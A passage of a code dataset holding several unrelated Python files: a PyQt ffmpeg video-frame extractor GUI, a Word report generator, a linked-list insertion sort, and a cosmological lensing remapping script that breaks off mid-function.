600\r\n self.interval_entry.textChanged.connect(self.update_interval_slider_from_entry)\r\n self.interval_entry.setFixedWidth(50) # Adjust width as needed\r\n\r\n interval_layout = QHBoxLayout()\r\n interval_layout.addWidget(QLabel(\"Interval (in seconds):\"))\r\n interval_layout.addWidget(self.interval_slider)\r\n interval_layout.addWidget(self.interval_entry)\r\n\r\n settings_layout.addLayout(interval_layout)\r\n \r\n # Output Format\r\n self.output_format = QComboBox(self)\r\n self.output_format.addItems([\"png\", \"jpg\", \"bmp\", \"tiff\"])\r\n\r\n # Resolution\r\n self.resolution_dropdown = QComboBox(self)\r\n self.resolution_dropdown.addItems([\"4K (3840x2160)\", \"2K (2560x1440)\", \"1080p (1920x1080)\", \"720p (1280x720)\", \"640p (640x480)\", \"480p (854x480)\"])\r\n \r\n # Output and Resolution Drop Downs\r\n format_layout = QHBoxLayout()\r\n format_layout.addWidget(QLabel(\"Output Format 
(lossless):\"))\r\n format_layout.addWidget(self.output_format)\r\n format_layout.addWidget(QLabel(\"Resolution:\"))\r\n format_layout.addWidget(self.resolution_dropdown)\r\n settings_layout.addLayout(format_layout)\r\n\r\n\r\n\r\n \r\n # File Name\r\n self.frame_name_entry = QLineEdit(self)\r\n settings_layout.addWidget(QLabel(\"Frame Name:\"))\r\n settings_layout.addWidget(self.frame_name_entry)\r\n \r\n # GPU Acceleration Frame\r\n gpu_acceleration_group = QGroupBox(\"GPU Acceleration (Beta)\", self)\r\n gpu_acceleration_layout = QVBoxLayout()\r\n\r\n self.gpu_accel_checkbox = QCheckBox(\"Enable GPU Acceleration\", self)\r\n gpu_acceleration_layout.addWidget(self.gpu_accel_checkbox)\r\n\r\n self.gpu_accel_method = QComboBox(self)\r\n self.gpu_accel_method.addItems([\"cuda\", \"dxva2\", \"qsv\", \"d3d11va\", \"opencl\", \"vulkan\"])\r\n gpu_acceleration_layout.addWidget(QLabel(\"Acceleration Method:\"))\r\n gpu_acceleration_layout.addWidget(self.gpu_accel_method)\r\n\r\n gpu_acceleration_group.setLayout(gpu_acceleration_layout)\r\n settings_layout.addWidget(gpu_acceleration_group)\r\n \r\n # Spacer before progress bar\r\n settings_layout.addStretch(1)\r\n \r\n self.progress_bar = QProgressBar(self)\r\n self.progress_bar.setMinimumWidth(200)\r\n settings_layout.addWidget(self.progress_bar)\r\n\r\n # Spacer after progress bar\r\n settings_layout.addStretch(1)\r\n \r\n # Add the settings_layout to the left_layout\r\n left_layout.addLayout(settings_layout)\r\n \r\n self.status_label = QLabel(self)\r\n left_layout.addWidget(self.status_label)\r\n self.frames_label = QLabel(self)\r\n left_layout.addWidget(self.frames_label)\r\n\r\n button_layout = QHBoxLayout()\r\n self.start_btn = QPushButton(\"Start Extraction\", self)\r\n self.start_btn.setStyleSheet(\"background-color: green; color: white;\")\r\n self.start_btn.clicked.connect(self.start_extraction)\r\n button_layout.addWidget(self.start_btn)\r\n\r\n self.open_dir_btn = QPushButton(\"Open Directory\", self)\r\n self.open_dir_btn.clicked.connect(self.open_directory)\r\n button_layout.addWidget(self.open_dir_btn)\r\n\r\n self.cancel_btn = QPushButton(\"Cancel Extraction\", self)\r\n self.cancel_btn.setStyleSheet(\"background-color: red; color: white;\")\r\n self.cancel_btn.clicked.connect(self.handle_cancel)\r\n button_layout.addWidget(self.cancel_btn)\r\n\r\n left_layout.addLayout(button_layout)\r\n \r\n # Video Preview\r\n video_layout = QVBoxLayout()\r\n self.video_player = QMediaPlayer(self)\r\n self.video_widget = QVideoWidget(self)\r\n self.video_widget.setFixedSize(400, 300)\r\n self.video_title_label = QLabel(\"Video Preview:\")\r\n video_layout.addWidget(self.video_title_label)\r\n video_layout.addWidget(self.video_widget)\r\n self.video_player.setVideoOutput(self.video_widget)\r\n \r\n \r\n # Video Slider and Timestamp Entry Layout\r\n slider_timestamp_layout = QHBoxLayout()\r\n\r\n # Video Slider\r\n self.video_slider = QSlider(Qt.Horizontal, self)\r\n self.video_slider.setRange(0, 0)\r\n self.video_slider.sliderMoved.connect(self.set_position)\r\n slider_timestamp_layout.addWidget(self.video_slider)\r\n \r\n self.video_player.positionChanged.connect(self.position_changed)\r\n self.video_player.durationChanged.connect(self.duration_changed)\r\n self.video_slider.sliderMoved.connect(self.set_position)\r\n self.video_slider.setTracking(False)\r\n \r\n # Timestamp Entry\r\n self.timestamp_entry = QLineEdit(self)\r\n self.timestamp_entry.setPlaceholderText(\"HH:MM:SS\")\r\n self.timestamp_entry.setMaximumWidth(80) # Adjust width as 
needed\r\n self.timestamp_entry.returnPressed.connect(self.seek_to_timestamp)\r\n slider_timestamp_layout.addWidget(self.timestamp_entry)\r\n\r\n video_layout.addLayout(slider_timestamp_layout)\r\n\r\n # Playback Controls\r\n controls_layout = QHBoxLayout()\r\n self.play_btn = QPushButton(\"Play\", self)\r\n self.play_btn.clicked.connect(self.video_player.play)\r\n controls_layout.addWidget(self.play_btn)\r\n\r\n self.pause_btn = QPushButton(\"Pause\", self)\r\n self.pause_btn.clicked.connect(self.video_player.pause)\r\n controls_layout.addWidget(self.pause_btn)\r\n\r\n self.stop_btn = QPushButton(\"Stop\", self)\r\n self.stop_btn.clicked.connect(self.video_player.stop)\r\n controls_layout.addWidget(self.stop_btn)\r\n\r\n video_layout.addLayout(controls_layout)\r\n left_layout.addLayout(video_layout)\r\n \r\n # Quick Extract\r\n self.quick_extract_btn = QPushButton(\"Quick Extract\", self)\r\n self.quick_extract_btn.clicked.connect(self.quick_extract)\r\n left_layout.addWidget(self.quick_extract_btn)\r\n \r\n # Right side layout for previews\r\n right_layout = QVBoxLayout()\r\n \r\n # First Frame\r\n self.first_frame_label = QLabel(self)\r\n self.first_frame_label.setFixedSize(400, 300)\r\n self.first_frame_title_label = QLabel(\"First Frame:\")\r\n right_layout.addWidget(self.first_frame_title_label)\r\n right_layout.addWidget(self.first_frame_label)\r\n \r\n # Last Frame\r\n self.last_frame_label = QLabel(self)\r\n self.last_frame_label.setFixedSize(400, 300)\r\n self.last_frame_title_label = QLabel(\"Last Frame:\")\r\n right_layout.addWidget(self.last_frame_title_label)\r\n right_layout.addWidget(self.last_frame_label)\r\n \r\n # Add left and right layouts to main layout\r\n main_layout.addLayout(left_layout)\r\n main_layout.addLayout(right_layout)\r\n \r\n main_widget.setLayout(main_layout)\r\n\r\n # Set window properties\r\n self.setWindowTitle('VidFrameFetcher')\r\n self.setWindowIcon(QIcon('./images/icon.png')) # Update path as needed\r\n self.resize(0, 0) # Adjust size if needed\r\n \r\n # Accept Drops\r\n self.setAcceptDrops(True)\r\n \r\n # Hide the corresponding widgets by default\r\n self.toggle_video_player(Qt.Unchecked)\r\n self.toggle_frame_previews(Qt.Unchecked)\r\n\r\n # Adjust the window size\r\n self.adjustSize()\r\n \r\n # Ensure the window cannot be resized larger than the size hint of its layout\r\n self.layout().setSizeConstraint(QLayout.SetFixedSize)\r\n \r\n \r\n '''# Tool Tips\r\n \r\n #QLineEdit\r\n self.video_path_entry.setToolTip(\"Path to the video file you want to extract frames from.\")\r\n self.output_dir_entry.setToolTip(\"Directory where the extracted frames will be saved.\")\r\n self.frame_name_entry.setToolTip(\"Base name for the extracted frames.\")\r\n self.timestamp_entry.setToolTip(\"Enter a timestamp (HH:MM:SS) to seek to that position in the video.\")\r\n \r\n #QComboBox\r\n self.output_format.setToolTip(\"Select the format for the extracted frames.\")\r\n self.resolution_dropdown.setToolTip(\"Select the resolution for the extracted frames.\")\r\n self.gpu_accel_method.setToolTip(\"Select the GPU acceleration method (if GPU acceleration is enabled).\")\r\n \r\n #QCheckBox\r\n self.dark_mode_checkbox.setToolTip(\"Toggle dark mode for the application.\")\r\n self.toggle_video_player_checkbox.setToolTip(\"Show or hide the video player.\")\r\n self.toggle_frame_previews_checkbox.setToolTip(\"Show or hide the frame previews.\")\r\n self.gpu_accel_checkbox.setToolTip(\"Enable or disable GPU acceleration for frame extraction.\")\r\n \r\n #QSlider\r\n 
self.interval_slider.setToolTip(\"Set the interval (in seconds) between extracted frames.\")\r\n self.video_slider.setToolTip(\"Seek to a specific position in the video.\")\r\n \r\n #QPushButton\r\n self.browse_video_btn.setToolTip(\"Browse and select a video file.\")\r\n self.browse_output_dir_btn.setToolTip(\"Browse and select an output directory.\")\r\n self.start_btn.setToolTip(\"Start the frame extraction process.\")\r\n self.open_dir_btn.setToolTip(\"Open the selected output directory.\")\r\n self.cancel_btn.setToolTip(\"Cancel the ongoing frame extraction process.\")\r\n self.play_btn.setToolTip(\"Play the video.\")\r\n self.pause_btn.setToolTip(\"Pause the video.\")\r\n self.stop_btn.setToolTip(\"Stop the video.\")\r\n self.quick_extract_btn.setToolTip(\"Quickly extract a frame from the current video position.\")\r\n \r\n #QGroupBox\r\n gpu_acceleration_group.setToolTip(\"Settings related to GPU acceleration for frame extraction.\")\r\n\r\n #QProgressBar\r\n self.progress_bar.setToolTip(\"Shows the progress of the frame extraction process.\")\r\n \r\n #QLabel\r\n self.first_frame_label.setToolTip(\"Preview of the first extracted frame.\")\r\n self.last_frame_label.setToolTip(\"Preview of the last extracted frame.\")'''\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n def update_first_frame_preview(self, frame_path):\r\n pixmap = QPixmap(frame_path).scaled(400, 300, Qt.KeepAspectRatio, Qt.SmoothTransformation)\r\n self.first_frame_label.setPixmap(pixmap)\r\n\r\n def update_last_frame_preview(self, frame_path):\r\n pixmap = QPixmap(frame_path).scaled(400, 300, Qt.KeepAspectRatio, Qt.SmoothTransformation)\r\n self.last_frame_label.setPixmap(pixmap)\r\n\r\n def toggle_dark_mode(self, state):\r\n if state == Qt.Checked:\r\n qdarktheme.setup_theme()\r\n else:\r\n qdarktheme.setup_theme(\"light\") # or perhaps the default theme of your app\r\n \r\n def select_video_file(self):\r\n options = QFileDialog.Options()\r\n filepath, _ = QFileDialog.getOpenFileName(self, \"Select a Video File\", \"\", \"Video Files (*.mp4; *.mkv; *.avi; *.mov);;All Files (*)\", options=options)\r\n if filepath:\r\n self.video_path_entry.setText(filepath)\r\n self.video_player.setMedia(QMediaContent(QUrl.fromLocalFile(filepath)))\r\n\r\n def handle_media_status_change(self, status):\r\n if status == QMediaPlayer.MediaStatus.LoadedMedia:\r\n # Media is loaded and ready to play\r\n pass\r\n elif status in [QMediaPlayer.MediaStatus.InvalidMedia, QMediaPlayer.MediaStatus.NoMedia, QMediaPlayer.MediaStatus.UnknownMediaStatus]:\r\n error_msg = f\"Unable to play the provided video file: {self.video_path_entry.text()}\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n\r\n def select_output_directory(self):\r\n options = QFileDialog.Options()\r\n directory = QFileDialog.getExistingDirectory(self, \"Select an Output Directory\", \"\", options=options)\r\n if directory:\r\n self.output_dir_entry.setText(directory)\r\n \r\n def update_interval_entry(self, value):\r\n self.interval_entry.setText(str(value))\r\n\r\n def update_interval_slider_from_entry(self, text):\r\n if text: # Check if the text is not empty\r\n value = int(text)\r\n self.interval_slider.setValue(value)\r\n \r\n def position_changed(self, position):\r\n self.video_slider.setValue(position)\r\n h, m, s = position // 3600000, (position % 3600000) // 60000, (position % 60000) // 1000\r\n self.timestamp_entry.setText(f\"{h:02d}:{m:02d}:{s:02d}\")\r\n\r\n\r\n def duration_changed(self, duration):\r\n self.video_slider.setRange(0, 
duration)\r\n\r\n def set_position(self, position):\r\n self.video_player.setPosition(position)\r\n \r\n def seek_to_timestamp(self):\r\n timestamp_str = self.timestamp_entry.text()\r\n try:\r\n h, m, s = map(int, timestamp_str.split(':'))\r\n milliseconds = (h * 3600 + m * 60 + s) * 1000\r\n self.video_player.setPosition(milliseconds)\r\n except ValueError:\r\n # Handle invalid input format\r\n pass\r\n\r\n # Quick Extract \r\n def quick_extract(self):\r\n video_path = self.video_path_entry.text()\r\n output_dir = self.output_dir_entry.text()\r\n\r\n # Check if video path is valid\r\n if not video_path or not os.path.exists(video_path):\r\n error_msg = \"Please select a valid video file.\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n # Check if output directory is specified\r\n if not output_dir:\r\n error_msg = \"Please specify an output directory.\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n # Check if output directory exists, if not, create it\r\n if not os.path.exists(output_dir):\r\n os.makedirs(output_dir)\r\n\r\n timestamp = self.video_player.position() / 1000 # Convert from ms to seconds\r\n base_name = \"snapshot\"\r\n output_file = os.path.join(output_dir, f\"{base_name}_{int(timestamp)}.png\")\r\n\r\n cmd = [\"ffmpeg\", \"-ss\", str(timestamp), \"-i\", video_path, \"-vf\", f\"scale=-1:1080\", \"-vframes\", \"1\", \"-c:v\", \"png\", \"-an\", output_file]\r\n \r\n if self.gpu_accel_checkbox.isChecked():\r\n method = self.gpu_accel_method.currentText()\r\n cmd.insert(1, \"-hwaccel\")\r\n cmd.insert(2, method)\r\n\r\n result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, creationflags=subprocess.CREATE_NO_WINDOW)\r\n if result.returncode != 0:\r\n error_msg = f\"Error on extracting snapshot at {timestamp}s:\\n{result.stderr}\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n else:\r\n print(f\"Snapshot saved to {output_file}\")\r\n \r\n # Hide/Show Video Player / Frame Preview methods\r\n def toggle_video_player(self, state):\r\n if state == Qt.Checked:\r\n self.video_title_label.show()\r\n self.video_widget.show()\r\n self.play_btn.show()\r\n self.pause_btn.show()\r\n self.stop_btn.show()\r\n self.video_slider.show()\r\n self.timestamp_entry.show() # Add this line\r\n self.quick_extract_btn.show()\r\n else:\r\n self.video_title_label.hide()\r\n self.video_widget.hide()\r\n self.play_btn.hide()\r\n self.pause_btn.hide()\r\n self.stop_btn.hide()\r\n self.video_slider.hide()\r\n self.timestamp_entry.hide() # Add this line\r\n self.quick_extract_btn.hide()\r\n self.adjustSize()\r\n\r\n\r\n def toggle_frame_previews(self, state):\r\n if state == Qt.Checked:\r\n self.first_frame_title_label.show()\r\n self.first_frame_label.show()\r\n self.last_frame_title_label.show()\r\n self.last_frame_label.show()\r\n else:\r\n self.first_frame_title_label.hide()\r\n self.first_frame_label.hide()\r\n self.last_frame_title_label.hide()\r\n self.last_frame_label.hide()\r\n self.adjustSize()\r\n \r\n\r\n # Start Extraction \r\n def start_extraction(self):\r\n video_path = self.video_path_entry.text()\r\n output_dir = self.output_dir_entry.text()\r\n\r\n if not video_path or not os.path.exists(video_path):\r\n error_msg = \"Please select a valid video file.\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n if not os.path.exists(output_dir):\r\n error_msg = f\"Output 
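position_changed() and seek_to_timestamp() above convert between the player's millisecond positions and HH:MM:SS text. The same arithmetic as standalone helpers:

def ms_to_hms(position):
    # identical arithmetic to position_changed() above
    h, m, s = position // 3600000, (position % 3600000) // 60000, (position % 60000) // 1000
    return f"{h:02d}:{m:02d}:{s:02d}"

def hms_to_ms(text):
    # identical arithmetic to seek_to_timestamp(); raises ValueError on bad input
    h, m, s = map(int, text.split(":"))
    return (h * 3600 + m * 60 + s) * 1000

assert ms_to_hms(3723000) == "01:02:03"
assert hms_to_ms("01:02:03") == 3723000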
directory {output_dir} does not exist.\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n video_duration = get_video_duration(video_path)\r\n if video_duration is None:\r\n error_msg = \"Couldn't determine video duration. Exiting.\"\r\n QMessageBox.critical(self, \"Error\", error_msg)\r\n logging.error(error_msg)\r\n return\r\n\r\n num_screenshots = int(video_duration) // int(self.interval_entry.text())\r\n logging.info(f\"Extraction started for {num_screenshots} frames.\")\r\n \r\n resolution = self.resolution_dropdown.currentText().split(\" \")[1].replace(\"(\", \"\").replace(\")\", \"\")\r\n self.worker = FrameExtractorWorker(\r\n self.video_path_entry.text(),\r\n self.output_dir_entry.text(),\r\n int(self.interval_entry.text()),\r\n self.frame_name_entry.text(),\r\n self.output_format.currentText(),\r\n resolution,\r\n self.gpu_accel_checkbox.isChecked(),\r\n self.gpu_accel_method.currentText()\r\n )\r\n\r\n # Signals\r\n self.worker.extraction_completed_signal.connect(self.log_extraction_completion)\r\n self.worker.update_progress_signal.connect(self.update_progress)\r\n self.worker.update_status_signal.connect(self.update_status)\r\n self.worker.update_frames_signal.connect(self.update_frames)\r\n self.worker.first_frame_signal.connect(self.update_first_frame_preview)\r\n self.worker.last_frame_signal.connect(self.update_last_frame_preview)\r\n self.worker.start()\r\n \r\n #Drag and Drop\r\n def dragEnterEvent(self, event):\r\n mime_data = event.mimeData()\r\n if mime_data.hasUrls() and len(mime_data.urls()) == 1:\r\n file_path = mime_data.urls()[0].toLocalFile()\r\n if file_path.lower().endswith(('.mp4', '.mkv', '.avi', '.mov')):\r\n event.acceptProposedAction()\r\n\r\n def dropEvent(self, event):\r\n file_path = event.mimeData().urls()[0].toLocalFile()\r\n self.video_path_entry.setText(file_path)\r\n self.video_player.setMedia(QMediaContent(QUrl.fromLocalFile(file_path)))\r\n \r\n # Log Completed Extraction\r\n def log_extraction_completion(self, num_frames, output_dir):\r\n logging.info(f\"Extraction completed. 
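start_extraction() above hands the long-running ffmpeg loop to a FrameExtractorWorker and wires its signals to UI slots, the standard QThread-plus-pyqtSignal pattern: the worker thread only emits, and the GUI thread keeps ownership of the widgets. A stripped-down sketch with invented names:

from PyQt5.QtCore import QThread, pyqtSignal

class DemoWorker(QThread):
    update_progress_signal = pyqtSignal(int)   # emitted from the worker thread

    def __init__(self, steps):
        super().__init__()
        self.steps = steps
        self.cancel_requested = False

    def run(self):
        for i in range(self.steps):
            if self.cancel_requested:
                break
            # ... one unit of work here ...
            self.update_progress_signal.emit(int((i + 1) / self.steps * 100))

    def stop(self):
        self.cancel_requested = True

# Wiring from the GUI thread, mirroring start_extraction() above:
#   worker = DemoWorker(100)
#   worker.update_progress_signal.connect(progress_bar.setValue)
#   worker.start()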
{num_frames} frames extracted to {output_dir}.\")\r\n\r\n #Cancel\r\n def handle_cancel(self):\r\n if hasattr(self, 'worker'):\r\n self.worker.stop()\r\n logging.info(\"Extraction cancelled by the user.\")\r\n\r\n def update_progress(self, value):\r\n self.progress_bar.setValue(value)\r\n\r\n def update_status(self, text):\r\n self.status_label.setText(text)\r\n\r\n def update_frames(self, text):\r\n self.frames_label.setText(text)\r\n \r\n def open_directory(self):\r\n output_dir = self.output_dir_entry.text()\r\n if not output_dir:\r\n QMessageBox.critical(self, \"Error\", \"No directory selected.\")\r\n return\r\n\r\n if os.path.exists(output_dir):\r\n webbrowser.open(output_dir)\r\n else:\r\n QMessageBox.critical(self, \"Error\", f\"Directory {output_dir} does not exist.\")\r\n\r\n \r\n def closeEvent(self, event):\r\n logging.info(\"Application closed.\")\r\n event.accept()\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n app.setStyle(\"Fusion\") # Set the application style to Fusion\r\n ex = FFmpegFrameExtractorApp()\r\n ex.show()\r\n sys.exit(app.exec_())","repo_name":"mdscwo/VideoFrameExtractor","sub_path":"VidFrameFetcher 1.0.py","file_name":"VidFrameFetcher 1.0.py","file_ext":"py","file_size_in_byte":30512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19027426384","text":"from docx import Document\nfrom docx.shared import Inches\nfrom visualization_data import read_xlsx, get_text\n\n\"\"\"\nA function that creates a complete report from the files 'raw_data/sample1.docx' and 'processed_data/processed_data.xlsx'\n\"\"\"\n\n\ndef data_report():\n doc = Document()\n\n # Header\n doc.add_heading('Привіт, це аналітика', level=4)\n\n # Inserting brief information about the sample1.docx file\n docx_file = get_text('../File_System/raw_data/sample1.docx')\n doc.add_paragraph(f'Коротко про цей файл. \\n{docx_file[0]}. 
{docx_file[1]}')\n\n # Table output\n doc.add_heading('Таблиця всіх присутніх', level=2)\n\n # Getting data from processed_data.xlsx file\n data_excel = read_xlsx()\n\n # Creating a table\n table = doc.add_table(rows=len(data_excel) + 1, cols=3)\n\n # Fill column headers\n table.cell(0, 0).text = 'ID'\n table.cell(0, 1).text = 'Імʼя'\n table.cell(0, 2).text = 'Прізвище'\n\n # Filling the table with data\n for i, item in enumerate(data_excel):\n id = item.get('id')\n first_name = item.get('first_name')\n last_name = item.get('last_name')\n table.cell(i + 1, 0).text = str(id)\n table.cell(i + 1, 1).text = first_name\n table.cell(i + 1, 2).text = last_name\n\n # Deleting content (text) from cells\n table.cell(1, 0).text = ''\n table.cell(1, 1).text = ''\n table.cell(1, 2).text = ''\n\n # Image output\n doc.add_paragraph('\\nЦей графік дасть зрозуміти щось')\n doc.add_picture('media/plot.png', width=Inches(5.0))\n\n # Save\n doc.save('data_analysis_report.docx')\n\n\ndata_report()\n","repo_name":"DenLyakhovsky/Recognize-and-etc","sub_path":"Word/processor_word.py","file_name":"processor_word.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19487760709","text":"class ListNode:\r\n def __init__(self, x):\r\n self.val = x\r\n self.next = None\r\n\r\ndef insertionSort(head):\r\n if not head:\r\n return head\r\n curr=head.next\r\n sortedhead=head\r\n sortedtail=head\r\n head.next=None\r\n while curr:\r\n sortedcurr=sortedhead\r\n if curr.val<=sortedcurr.val: \r\n node=curr\r\n curr=curr.next\r\n node.next=sortedhead\r\n sortedhead=node\r\n else:\r\n while not sortedcurr.val==sortedtail.val:\r\n if sortedcurr.next.val>curr.val and sortedcurr.val<=curr.val:\r\n node=curr\r\n curr=curr.next\r\n node.next=sortedcurr.next\r\n sortedcurr.next=node\r\n break\r\n else:\r\n sortedcurr=sortedcurr.next\r\n if curr and curr.val>=sortedtail.val:\r\n node=curr\r\n curr=curr.next\r\n sortedtail.next=node\r\n node.next=None\r\n sortedtail=node\r\n return sortedhead\r\n\r\n# l1=ListNode(6)\r\n# l2=ListNode(7)\r\n# l3=ListNode(2)\r\n# l4=ListNode(5)\r\n# l5=ListNode(1)\r\n# l6=ListNode(3)\r\n# l7=ListNode(8)\r\n# l1.next=l2\r\n# l2.next=l3\r\n# l3.next=l4\r\n# l4.next=l5\r\n# l5.next=l6\r\n# l6.next=l7\r\n# sorted=insertionSort(l1)\r\n# print (sorted)\r\n\r\n# l1=ListNode(4)\r\n# l2=ListNode(2)\r\n# l3=ListNode(1)\r\n# l4=ListNode(3)\r\n# l1.next=l2\r\n# l2.next=l3\r\n# l3.next=l4\r\n# sorted=insertionSort(l1)\r\n# print (sorted) \r\n\r\n# l1=ListNode(1)\r\n# l2=ListNode(1)\r\n# l1.next=l2\r\n# sorted=insertionSort(l1)\r\n# print (sorted) \r\n\r\n\r\nl1=ListNode(4)\r\nl2=ListNode(19)\r\nl3=ListNode(14)\r\nl4=ListNode(5)\r\nl5=ListNode(-3)\r\nl6=ListNode(1)\r\nl7=ListNode(8)\r\nl8=ListNode(5)\r\nl9=ListNode(11)\r\nl10=ListNode(15)\r\nl1.next=l2\r\nl2.next=l3\r\nl3.next=l4\r\nl4.next=l5\r\nl5.next=l6\r\nl6.next=l7\r\nl7.next=l8\r\nl8.next=l9\r\nl9.next=l10\r\nsorted=insertionSort(l1)\r\nprint (sorted) ","repo_name":"yifanwangsh/myleet","sub_path":"insertionsort.py","file_name":"insertionsort.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10025112735","text":"from delensalot import remapping\nfrom delensalot.core import cachers\nfrom delensalot.core.helper.utils_scarf import Geom, scarfjob\nimport numpy as np\nfrom delensalot.core.helper import utils_scarf as sj\nimport healpy as hp\nfrom 
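The commented-out drivers in the insertion-sort file above end with print(sorted), which prints the head ListNode's default repr rather than the list contents (and shadows the built-in sorted along the way). A small invented traversal helper makes the result inspectable:

def to_list(head):
    # walk the singly linked list and collect the values for printing
    values = []
    while head:
        values.append(head.val)
        head = head.next
    return values

# e.g.: print(to_list(insertionSort(l1)))  # prints the node values in order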
delensalot.core.helper.utils_remapping import d2ang, ang2d\n\nfrom plancklens.utils import camb_clfile\n\nPBOUNDS = (0., 2 * np.pi)\nj = sj.scarfjob()\n#j.set_thingauss_geometry(3999, smax=2, zbounds=(0.9, 1))\nj.set_ecp_geometry(100, 100, tbounds=(0.0, np.pi / 10)) # This one is more tricky since has th == 0\n\nlmax = 3000\nclee = camb_clfile('../delensalot/data/cls/FFP10_wdipole_lensedCls.dat')['ee'][:lmax + 1]\nclpp = camb_clfile('../delensalot/data/cls/FFP10_wdipole_lenspotentialCls.dat')['pp'][:lmax + 1]\n\nglm = hp.synalm(clee, new=True)\nplm = hp.synalm(clpp, new=True)\n\ndlm = hp.almxfl(plm, np.sqrt(np.arange(lmax + 1) * np.arange(1, lmax + 2)))\n\nd = remapping.deflection(j.geom, 1.7, PBOUNDS, dlm, 8, 8, cacher=cachers.cacher_mem())\n\ndef fortransolve(defl:remapping.deflection, ir, ip=None):\n \"\"\"Emulates fortran solver on a ring\n\n \"\"\"\n defl._init_d1()\n (tht0, t2grid), (phi0, p2grid), (re_f, im_f) = defl.d1.get_spline_info()\n phis = Geom.phis(defl.geom, ir)[defl._pbds.contains(Geom.phis(defl.geom, ir))]\n tht = defl.geom.get_theta(ir)\n\n if ip is not None:\n assert np.isscalar(ip)\n phis = np.array([phis[ip]])\n print('thetaphi', tht, phis)\n\n thts = defl.geom.get_theta(ir) * np.ones(phis.size)\n #print(fremap.remapping.solve_pixs(re_f, im_f, thts[0:1], phis[0:1], tht0, phi0, t2grid, p2grid)[0])\n TOLAMIN =1e-10\n ft = (thts - tht0) * t2grid\n fp = (phis - phi0) %(2. *np.pi) * p2grid\n redi, imdi = -np.array(defl.d1.eval_ongrid(ft, fp))\n print(redi[0], imdi[0])\n\n maxres = 10.\n itr = 0\n ITRMAX=30\n version = int(np.rint(1 - 2 * tht / np.pi))\n tol = max(TOLAMIN / 180 / 60 * np.pi, 1e-15)\n while (maxres >= tol) & (itr <= ITRMAX) :\n itr = itr + 1\n thti, phii = d2ang(redi, imdi, thts, phis, version)\n ft = (thti - tht0) * t2grid\n fp = (phii - phi0)%(2 * np.pi) * p2grid\n red, imd = defl.d1.eval_ongrid(ft, fp)\n #print(red[0], imd[0])\n \"\"\"#=====\n e_t = 2 * np.sin(thti[3] * 0.5) ** 2\n d2 = red[3] * red[3] + imd[3] * imd[3]\n sind_d = 1. + np.poly1d([0., -1 / 6., 1. / 120., -1. 
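fortransolve() and pixel_solver() above invert the deflection by fixed-point iteration: start from minus the forward deflection, remap, measure the residual deflection, and subtract it until the residual drops below tolerance. A toy one-dimensional analogue of that loop; the displacement field d here is invented for illustration.

import numpy as np

def invert_displacement(d, x, tol=1e-12, itmax=30):
    # solve (x + di) + d(x + di) == x for di, as the angular solvers above do
    di = -d(x)                  # first guess: minus the forward displacement
    for _ in range(itmax):
        res = di + d(x + di)    # residual displacement after remapping back
        di -= res
        if np.max(np.abs(res)) < tol:
            break
    return di

d = lambda x: 0.05 * np.sin(x)  # toy smooth displacement field
x = np.linspace(0.0, 2.0 * np.pi, 5)
di = invert_displacement(d, x)
assert np.allclose(x + di + d(x + di), x)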
/ 5040.][::-1])(d2)\n e_d = 2 * np.sin(np.sqrt(red[3] * red[3] + imd[3] * imd[3]) * 0.5) ** 2\n e_tp = e_t + e_d - e_t * e_d + version * red[3] * sind_d * np.sin(thti[3]) # 1 -+ cost'\n \"\"\"\n #assert (e_tp * (2 - e_tp) > 0.), (e_tp * (2 - e_tp), e_tp, e_t, e_d)\n #=====\n thtn, phin= d2ang(red, imd, thti, phii, version)\n re_res, im_res = ang2d(thtn, thts, phin - phis) # residual deflection field\n res = np.sqrt(re_res * re_res + im_res * im_res)\n maxres = np.max(res)\n redi = redi - re_res\n imdi = imdi - im_res\n print(maxres / np.pi * 180 * 60, 'pixel index ' + str(np.argmax(res)))\n print(itr, ITRMAX, maxres / np.pi * 180 * 60)\n return redi, imdi, thti, phii\n\ndef pixel_solver(defl:remapping.deflection, ir:int, ip:int):\n \"\"\"Solves the inversion 'exactly' (wo splines but brute-force SHT) for a single pixel\n\n \"\"\"\n defl._init_d1()\n sc_job_pixel = scarfjob()\n sc_job_check = scarfjob()\n sc_job_pixel.set_nthreads(1)\n sc_job_pixel.set_triangular_alm_info(defl.lmax_dlm, defl.mmax_dlm)\n\n sc_job_check.set_nthreads(8)\n sc_job_check.set_triangular_alm_info(defl.lmax_dlm, defl.mmax_dlm)\n dclm = [defl.dlm, defl.dlm * 0]\n\n tht = defl.geom.get_theta(ir)\n thts = np.array([tht])\n phi = Geom.phis(defl.geom, ir)[defl._pbds.contains(Geom.phis(defl.geom, ir))][ip]\n sc_job_pixel.set_pixel_geometry(tht, phi)\n sc_job_check.set_ecp_geometry(2, 2, tbounds=(tht, np.pi))\n\n print('thetaphi', tht, phi, Geom.phis(sc_job_pixel.geom, 0))\n phis = np.array([phi])\n TOLAMIN =1e-10\n #ft = (thts - tht0) * t2grid\n #fp = (phis - tht0) %(2. *np.pi) * p2grid\n redi, imdi = -sc_job_pixel.alm2map_spin(dclm, 1)[:,0:1]\n redcheck, imdcheck = -sc_job_check.alm2map_spin(dclm, 1)\n print(redi[0], imdi[0], redcheck[0], imdcheck[0])\n\n maxres = 10.\n itr = 0\n ITRMAX=30\n version = int(np.rint(1 - 2 * tht / np.pi))\n tol = max(TOLAMIN / 180 / 60 * np.pi, 1e-15)\n\n while (maxres >= tol) & (itr <= ITRMAX) :\n itr = itr + 1\n thti, phii = d2ang(redi, imdi, thts, phis, version)\n 